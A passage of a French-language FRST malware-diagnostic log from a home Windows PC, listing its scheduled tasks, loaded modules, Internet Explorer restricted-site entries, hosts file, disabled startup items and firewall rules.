System32\Tasks\{9B6326F5-89AC-4508-8D91-AA8ADE885A47} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {219033E0-8996-48AA-B01F-1A1598CC6EB1} - System32\Tasks\HP AR Program Upload - b2c303c2230c41538f9c265b7c7d027ad8a2a3555d364cf8aeb2ff645f701a5d => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {229A2771-1EA6-4920-8FE4-5A7F9CC017F7} - System32\Tasks\HP AR Program Upload - d833d2a692c0482cac41ee658ef5f9180758139567e14a858add6488f549e3f8 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {2A83ADBD-4FC2-4102-A225-CA8E7D5D629D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-139836275-4246878868-498758953-1000UA => C:\Users\Martine\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-18] (Google Inc.) Task: {2BD05BA6-988D-4BD3-A9CD-9A39F80AF524} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> Pas de fichier <==== ATTENTION Task: {2EED1DCF-494D-48D2-97EC-16458EE52E5F} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> Pas de fichier <==== ATTENTION Task: {41407E38-688E-4F8B-87DB-10CE0CBD54D6} - System32\Tasks\{316241EA-EC54-411A-83E6-58BEE6E6868D} => C:\Windows\system32\pcalua.exe -a D:\Téléchargements\jxpiinstall.exe -d D:\Téléchargements Task: {4177A613-0D34-4DA7-9DD5-69C7D347EA35} - System32\Tasks\HP AR Program Upload - 86c007658c5a40c388cd03419cccaa34eeaa641101bb48d18f9d4d404e369937 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {42091C1F-1AF8-4312-BE29-301350121FD2} - System32\Tasks\HP AR Program Upload - a2fc14153aaa483fbe3cf212da5516041db201b8cb9f47678d72e5900d60e488 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {46DF37D7-ED05-4D13-9930-1D5D697F9E0C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-07-14] (Adobe Systems Incorporated) Task: {4B12D155-8DBA-432F-96EF-F96BB1C87151} - System32\Tasks\{C9CBA841-51F7-47E8-8BFD-FF471C818F88} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {4B749E05-908B-425A-B071-7D1F34905B6C} - System32\Tasks\HP AR Program Upload - fd7fb57b3e2343e88f0c89a8295846fbb7ff55654c7445cb92b218f58996ff61 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {52AA019D-43B7-4E02-A6D1-04C42C5B46D9} - System32\Tasks\Go to RoboForm Install page => C:\Windows\system32\rundll32.exe url.dll,FileProtocolHandler "hxxp://www.roboform.com/test-pass.html?aaa=KICMLMOJPMLMJMPMHMLMCNMJGMGMKJCNLMJJKJNJCNGMLJLMLMCNGMIMLMMMMJLJGMIMOJLJKJJJJNJICMJMCNGMCNGMJMFMHMCNPMCNJMPMPMOMFMJMCNPMCNJMPMPMNMCNNMJNPICMPMFMEKMICNJJCKFMIMGMJNHICMEKMICNJJCKJNBJCMCLOJNILIGJBJKJJNKJCMJNNICMJNDJCMJJNI" Task: {5386B833-E0D8-40B8-8751-5D92CE6882E3} - \GU4SkipUAC -> Pas de fichier <==== ATTENTION Task: {54124D14-7552-48C1-B5AB-4937A24E4ED9} - System32\Tasks\{BF454DA6-CD36-43A2-92CC-A7AA184A790C} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {561375CB-FF5A-417B-B297-BA73DE149581} - System32\Tasks\Microsoft\Windows\Wired\GatherWiredInfo => C:\Windows\system32\gatherWiredInfo.vbs Task: {5B184694-64C3-4633-94C5-945B3FA561D6} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> Pas de fichier <==== ATTENTION Task: {602A6150-3CA5-4304-9D6D-33BDB86BE22C} - System32\Tasks\HPCustParticipation HP ENVY 4500 series => C:\Program Files\HP\HP ENVY 4500 series\Bin\HPCustPartic.exe [2013-11-29] (Hewlett-Packard Co.) Task: {7215BD5C-9F41-4ED9-875E-A99A06E380F8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2017-02-14] (Apple Inc.) Task: {78BC12DC-FEC3-4467-8D56-9DB1E18FE123} - System32\Tasks\HP AR Program Upload - 3fe71cd6aa654f6d81c4052c01e99cc1d918e1a6808042d7b00cdd79439c1ab9 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {7B64982D-B3E4-40D9-80D7-B85634869F14} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd) Task: {7D0A9525-80C7-4517-B66B-1368F5D577FF} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe Task: {81F68C68-A302-433D-9CA8-5004756CF9C0} - System32\Tasks\SafeZone scheduled Autoupdate 1458731350 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-06-13] (Avast Software) Task: {8C47A3EA-618F-46DD-B234-50539A0C43A1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: {8E09A045-020B-42B0-880E-55CD72ADF7EC} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2016-10-14] (Dropbox, Inc.) Task: {975191FF-83F5-4B33-905E-2B53D1483C4F} - System32\Tasks\GarminUpdaterTask => C:\Program Files\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [2017-01-09] () Task: {98DA99A4-595D-4D0F-B7D7-3815CC4A995B} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files\Dropbox\Update\DropboxUpdate.exe [2016-10-14] (Dropbox, Inc.) Task: {9A3D2369-BC56-4A3E-9FD2-3E36CC1928FF} - System32\Tasks\HP AR Program Upload - 6c158b4e300049cbbed9545b2aa2b85ee12b7ff3c5ce46a39aa0ef55b1e5d828 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {9F54B95F-5096-4803-AE61-E9B3AC5B616D} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> Pas de fichier <==== ATTENTION Task: {B3E170E7-125F-40F4-9E72-64FD6AFEE3A7} - System32\Tasks\Open URL by RoboForm => C:\Windows\system32\rundll32.exe url.dll,FileProtocolHandler "hxxp://www.roboform.com/uninstall.html?aaa=KICMLMOJPMLMJMPMHMLMCNMJGMGMKJCNLMJJKJNJCNGMLJLMLMCNGMIMLMMMMJLJGMIMOJLJKJJJJNJICMIMCNGMCNOMNMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJNPICMPMFMFMIMKMGMJNHICMIIJJAJNICJJNBJCMCLOJNILIGJBJKJJNKJCMJNNICMJNDJCMJJNIJNMJCMPMFMPMFMPM (l'élément de données a 33 caractères en plus). Task: {B7BB4581-61B6-40D2-837A-063E64B137B1} - System32\Tasks\HP AR Program Upload - 979ae0d6033a4fcfa966d65b1f82f33e64a8dae02a614848ac3b35ff44caf1c5 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {BE1F230C-0CA2-491D-AF1E-71E23ECEA8D7} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-139836275-4246878868-498758953-1000Core => C:\Users\Martine\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-18] (Google Inc.) Task: {C582B762-41C8-4F32-88CB-0AF0F4A31920} - System32\Tasks\{F01A1136-4F2B-4B71-B3FB-0B6384E56138} => C:\Program Files\Garmin\Training Center\Training Center.exe Task: {CDF29D21-9A58-427F-BDB8-13232E1CF265} - System32\Tasks\{3C0EB816-E8D3-4FE0-A5C6-E8E30EDAD419} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {D21F6024-191F-4454-BBBC-09A650DA2549} - \Microsoft\Windows\Application Experience\AitAgent -> Pas de fichier <==== ATTENTION Task: {DBCB9AC4-D698-4551-8CC6-8A0E4D6B5E99} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-12] (AVAST Software) Task: {DD8D0AEE-5F3F-4979-BD7B-B313F797693A} - System32\Tasks\HP AR Program Upload - 8b64462cba434384a24d9ae42859109581a379dfa4a548d7880bc0d1c81a7be1 => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2013-11-29] (TODO: ) Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs Task: {E5314680-3AC9-46C0-BD7C-E605FEF805E4} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> Pas de fichier <==== ATTENTION Task: {E7735659-410D-4ABB-AF77-69AEE86A87C9} - System32\Tasks\{84F95D77-6DCC-415A-89B9-A4391DABBD37} => C:\Windows\system32\pcalua.exe -a C:\CommunicatorPlugin_403.exe -d C:\Users\Martine\Desktop Task: {F2C63D35-F8CF-4E61-846C-7DBE32B77B0F} - System32\Tasks\{1701E74E-69FC-4200-B115-5857ED2CF7BE} => C:\Program Files\Microsoft Money 2005\MNYCoreFiles\msmoney.exe [2004-08-06] (Microsoft(R) Corporation) Task: {F44F0B93-2280-4A90-B9F6-FFBF466E6742} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - Martine => C:\Program Files\Windows Calendar\wincal.exe Task: {FA1D52E3-1265-40B1-8DFA-24A5E6A96041} - System32\Tasks\Games\UpdateCheck_S-1-5-21-139836275-4246878868-498758953-1000 Task: {FAFBFF9B-B140-41A6-A703-38A052A8C91D} - System32\Tasks\{AD0408BD-ED64-4917-8B6E-39C059946F22} => C:\Windows\system32\pcalua.exe -a D:\Téléchargements\jre-8u66-windows-i586(1).exe -d D:\Téléchargements (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files\Dropbox\Update\DropboxUpdate.exe ==================== Raccourcis & WMI ======================== (Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.) ==================== Modules chargés (Avec liste blanche) ============== 2017-07-18 19:49 - 2017-07-18 19:49 - 00170224 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2017-07-18 19:49 - 2017-07-18 19:49 - 00192664 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll 2017-07-18 19:49 - 2017-07-18 19:49 - 00224256 _____ () C:\Program Files\AVAST Software\Avast\tasks_core.dll 2017-07-22 14:48 - 2017-07-22 14:48 - 05886720 _____ () C:\Program Files\AVAST Software\Avast\defs\17072200\algo.dll 2017-07-18 19:49 - 2017-07-18 19:49 - 00689272 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2017-07-18 19:49 - 2017-07-18 19:49 - 00231664 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll 2014-03-18 08:04 - 2012-09-18 16:26 - 00169472 _____ () C:\Windows\System32\ZLhp1020.DLL 2014-03-18 08:04 - 2012-09-18 16:26 - 00059904 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\pphp1020.dll 2017-05-09 00:45 - 2017-05-09 00:45 - 01041720 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2016-11-17 02:29 - 2016-11-17 02:29 - 00080184 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2017-02-14 09:42 - 2017-02-14 09:42 - 00326144 _____ () C:\Program Files\Garmin\Device Interaction Service\GpsImgWrapper.dll 2017-01-09 13:50 - 2017-01-09 13:50 - 00073216 _____ () C:\Program Files\Garmin\Device Interaction Service\FixBootSector.dll 2017-07-18 19:47 - 2017-07-18 19:47 - 00134928 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll 2017-07-18 19:50 - 2017-07-18 19:50 - 01065936 _____ () C:\Program Files\AVAST Software\Avast\AvChrome.dll 2017-07-01 12:30 - 2017-07-01 12:30 - 67109376 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll 2017-07-18 19:47 - 2017-07-18 19:47 - 00292920 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll ==================== Alternate Data Streams (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.) ==================== Mode sans échec (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\21686776.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\21686776.sys => ""="Driver" ==================== Association (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.) ==================== Internet Explorer sites de confiance/sensibles =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.) IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com IE restricted site: HKU\.DEFAULT\...\008k.com -> 008k.com IE restricted site: HKU\.DEFAULT\...\00hq.com -> 00hq.com IE restricted site: HKU\.DEFAULT\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\.DEFAULT\...\01i.info -> 01i.info IE restricted site: HKU\.DEFAULT\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\.DEFAULT\...\05p.com -> 05p.com IE restricted site: HKU\.DEFAULT\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\.DEFAULT\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\.DEFAULT\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\.DEFAULT\...\0calories.net -> 0calories.net IE restricted site: HKU\.DEFAULT\...\0cj.net -> 0cj.net IE restricted site: HKU\.DEFAULT\...\0scan.com -> 0scan.com IE restricted site: HKU\.DEFAULT\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> 1-domains-registrations.com IE restricted site: HKU\.DEFAULT\...\1-se.com -> 1-se.com IE restricted site: HKU\.DEFAULT\...\1001movie.com -> 1001movie.com IE restricted site: HKU\.DEFAULT\...\1001night.biz -> 1001night.biz IE restricted site: HKU\.DEFAULT\...\100gal.net -> 100gal.net IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> 100sexlinks.com Il y a 4788 plus de sites. IE trusted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\surveyrouter.com -> hxxp://ups.surveyrouter.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\008i.com -> 008i.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\008k.com -> 008k.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\00hq.com -> 00hq.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\0190-dialers.com -> 0190-dialers.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\01i.info -> 01i.info IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\05p.com -> 05p.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\0calories.net -> 0calories.net IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\0cj.net -> 0cj.net IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\0scan.com -> 0scan.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\1-domains-registrations.com -> 1-domains-registrations.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\1-se.com -> 1-se.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\1001movie.com -> 1001movie.com IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\1001night.biz -> 1001night.biz IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\100gal.net -> 100gal.net IE restricted site: HKU\S-1-5-21-139836275-4246878868-498758953-1000\...\100sexlinks.com -> 100sexlinks.com Il y a 4788 plus de sites. ==================== Hosts contenu: ========================== (Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.) 2006-11-02 12:23 - 2014-01-21 10:49 - 00000788 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost 127.0.0.1 localhost ==================== Autres zones ============================ (Actuellement, il n'y a pas de correction automatique pour cette section.) HKU\S-1-5-21-139836275-4246878868-498758953-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martine\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 212.27.40.241 - 212.27.40.240 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Le Pare-feu est activé. ==================== MSCONFIG/TASK MANAGER éléments désactivés == MSCONFIG\Services: AcronisOSSReinstallSvc => 3 MSCONFIG\Services: AdobeARMservice => 2 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: CLHNService => 2 MSCONFIG\Services: ePowerSvc => 2 MSCONFIG\Services: IDriverT => 3 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: NTI IScheduleSvc => 2 MSCONFIG\Services: NTIBackupSvc => 3 MSCONFIG\Services: NTISchedulerSvc => 2 MSCONFIG\Services: rpcapd => 3 MSCONFIG\Services: TryAndDecideService => 3 MSCONFIG\Services: WinRM => 3 MSCONFIG\Services: WPCSvc => 3 MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^hpoddt01.exe.lnk => C:\Windows\pss\hpoddt01.exe.lnk.CommonStartup MSCONFIG\startupreg: Acer ePower Management => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe MSCONFIG\startupreg: AcronisTimounterMonitor => C:\Program Files\Acronis\TrueImageHome\TimounterMonitor.exe MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: Adobe Reader Speed Launcher => MSCONFIG\startupreg: ANT Agent => MSCONFIG\startupreg: ApowersoftScreenRecorder => C:\Program Files\Apowersoft\Apowersoft Screen Recorder Pro 2.11\Apowersoft Screen Recorder Pro 2.exe /autoStart MSCONFIG\startupreg: ArcadeDeluxeAgent => "C:\Program Files\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe" MSCONFIG\startupreg: BackupManagerTray => "C:\Program Files\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" -k MSCONFIG\startupreg: ccleaner => MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR MSCONFIG\startupreg: CLMLServer => "C:\Program Files\Acer Arcade Deluxe\Acer Arcade Deluxe\Kernel\CLML\CLMLSvc.exe" MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun MSCONFIG\startupreg: Dropbox => "C:\Program Files\Dropbox\Client\Dropbox.exe" /systemstartup MSCONFIG\startupreg: FlashPlayerUpdate => C:\Windows\system32\Macromed\Flash\FlashUtil32_22_0_0_209_Plugin.exe -update plugin MSCONFIG\startupreg: GarminExpressTrayApp => "C:\Program Files\Garmin\Express Tray\ExpressTray.exe" MSCONFIG\startupreg: Google Desktop Search => MSCONFIG\startupreg: Google Photos Backup => "C:\Users\Martine\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe" /autostart MSCONFIG\startupreg: Google Update => C:\Users\Martine\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe MSCONFIG\startupreg: GUDelayStartup => MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe MSCONFIG\startupreg: HP ENVY 4500 series (NET) => "C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN39A2M6CT060F:NW" -scfn "HP ENVY 4500 series (NET)" -AutoStart 1 MSCONFIG\startupreg: HP Software Update => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe MSCONFIG\startupreg: ISUSPM => "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -scheduler MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: LManager => C:\Program Files\Launch Manager\LManager.exe MSCONFIG\startupreg: msnmsgr => "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background MSCONFIG\startupreg: mwlDaemon => MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe MSCONFIG\startupreg: PicPick Start => "C:\Program Files\PicPick\picpick.exe" /startup MSCONFIG\startupreg: PlayMovie => "C:\Program Files\Acer Arcade Deluxe\PlayMovie\PMVService.exe" MSCONFIG\startupreg: PLFSetI => C:\Windows\PLFSetI.exe MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun MSCONFIG\startupreg: Skytel => C:\Program Files\Realtek\Audio\HDA\Skytel.exe MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: swg => MSCONFIG\startupreg: SynTPEnh => MSCONFIG\startupreg: TrueImageMonitor.exe => C:\Program Files\Acronis\TrueImageHome\TrueImageMonitor.exe MSCONFIG\startupreg: WMPNSCFG => C:\Program Files\Windows Media Player\WMPNSCFG.exe ==================== RèglesPare-feu (Avec liste blanche) =============== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) FirewallRules: [UDP Query User{85494DDD-FA96-4B3B-8745-CB19FBE12B9F}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe FirewallRules: [TCP Query User{D59211D0-09ED-46DA-95E9-9F52426CB4B0}C:\program files\internet explorer\iexplore.exe] => (Block) C:\program files\internet explorer\iexplore.exe FirewallRules: [{16F93EEF-AF17-47DD-9874-BB6CE85106BD}] => (Allow) LPort=80 FirewallRules: [{7835552C-32B1-4597-A7F3-9922F682FFAF}] => (Allow) C:\Program Files\Acer Arcade Deluxe\PlayMovie\PMVService.exe FirewallRules: [{293B7BF0-04AE-45CE-9559-5BD56003DD3C}] => (Allow) C:\Program Files\Acer Arcade Deluxe\PlayMovie\PlayMovie.exe FirewallRules: [{D5CC402D-8565-4FD0-BCDE-1DE601BE4CF6}] => (Allow) C:\Program Files\Acer Arcade Deluxe\HomeMedia\HomeMedia.exe FirewallRules: [{A51638D2-FFDC-4D9D-AC78-BC31CB349537}] => (Allow) C:\Program Files\Acer Arcade Deluxe\Acer Arcade Deluxe\Acer Arcade Deluxe.exe FirewallRules: [{BBF645DB-5691-48BB-B59D-8B258DE3998F}] => (Allow) C:\Program Files\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe FirewallRules: [{06999EA9-A637-4DC5-8A68-41504817CA38}] => (Allow) C:\Program Files\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe FirewallRules: [{01B2195A-B7BB-4DE6-982D-05B1AB2E9F90}] => (Allow) C:\Program Files\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe FirewallRules: [{25A2318A-3792-4B73-AFC0-8ABBC34C0016}] => (Allow) C:\Program Files\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe FirewallRules: [{88FEAE73-F539-4709-89ED-D5E05D893043}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe FirewallRules: [{329AFB0B-DBAE-4197-B318-3A488B88D8E9}] => (Allow) svchost.exe FirewallRules: [{63C19850-5CD8-43F0-B255-26811CA1B616}] => (Allow) C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe FirewallRules: [{8F49E13F-3C14-4001-8C3A-FA42E9AEF72D}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe FirewallRules: [{2DEA69C6-43C4-4655-A8E3-5E8D37C0A15C}] => (Allow) LPort=2869 FirewallRules: [{A59F9861-D14A-40AC-A1D7-A3649A03BA6D}] => (Allow) LPort=1900 FirewallRules: [TCP Query User{24454CC0-AF9E-4DB6-A874-914532F8B99C}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe FirewallRules: [UDP Query User{B44AEE9A-4E6F-4ECE-9A25-9BADB728EB19}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe FirewallRules: [{13D68E49-BE93-4DBF-9302-34B8589DB8F8}] => (Block) C:\program files\videolan\vlc\vlc.exe FirewallRules: [{188A2AA9-62F2-4693-8803-359FC5FE3E36}] => (Block) C:\program files\videolan\vlc\vlc.exe FirewallRules: [{D0DE067A-0CF7-487F-90ED-E84317B751A7}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe FirewallRules: [{F6C4FA3C-D9E9-45B7-9424-36EBAFA05714}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\DeviceSetup.exe FirewallRules: [{F08A4747-116C-4B24-8D3B-BF63ADE15386}] => (Allow) LPort=5357 FirewallRules: [{F4CACCE8-23F3-4016-8765-DF1DF027A595}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{883E70F7-0B94-4C58-85B8-981633C8DA50}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{488C3025-632F-4677-8B3A-E8D488861E27}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{5425831E-2437-4F87-88B6-B918D8EC2173}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{27D7D5C4-7A86-4F18-A01C-D3E521068DAE}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe FirewallRules: [{C91CF776-D481-4A07-804B-EC9E49BBA7A3}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe FirewallRules: [{D97D19D9-8DBD-461D-A281-7B38485DF075}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{87574AC9-AA44-4222-99BC-99F201EA1D63}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{249A65FE-C36D-4CEF-BED3-D2AB00439324}] => (Allow) C:\Program Files\Apowersoft\Apowersoft Screen Recorder Pro 2.11\Apowersoft Screen Recorder Pro 2.exe FirewallRules: [{1AF8C1AC-C8E9-4C5E-947B-0ABBEB3E1F00}] => (Allow) C:\Program Files\Apowersoft\Apowersoft Screen Recorder Pro 2.11\Apowersoft Screen Recorder Pro 2.exe FirewallRules: [{ECFA0050-891B-4DD5-9852-9D077F5A4DBE}] => (Allow) C:\Program Files\Apowersoft\Streaming Video Recorder 6\Streaming Video Recorder 6.exe FirewallRules: [{084E164B-D1AA-41F5-80C1-6B51A081B46F}] => (Allow) C:\Program Files\Apowersoft\Streaming Video Recorder 6\Streaming Video Recorder 6.exe FirewallRules: [{1A0AA0AA-812A-4084-AE30-E67706B83412}] => (Allow) C:\Program Files\Apowersoft\Streaming Video Recorder 6\rtmpsrv.exe FirewallRules: [{0E60BDE3-E12D-4034-9585-73B5C8896A7C}] => (Allow) C:\Program Files\Apowersoft\Streaming Video Recorder 6\rtmpsrv.exe FirewallRules: 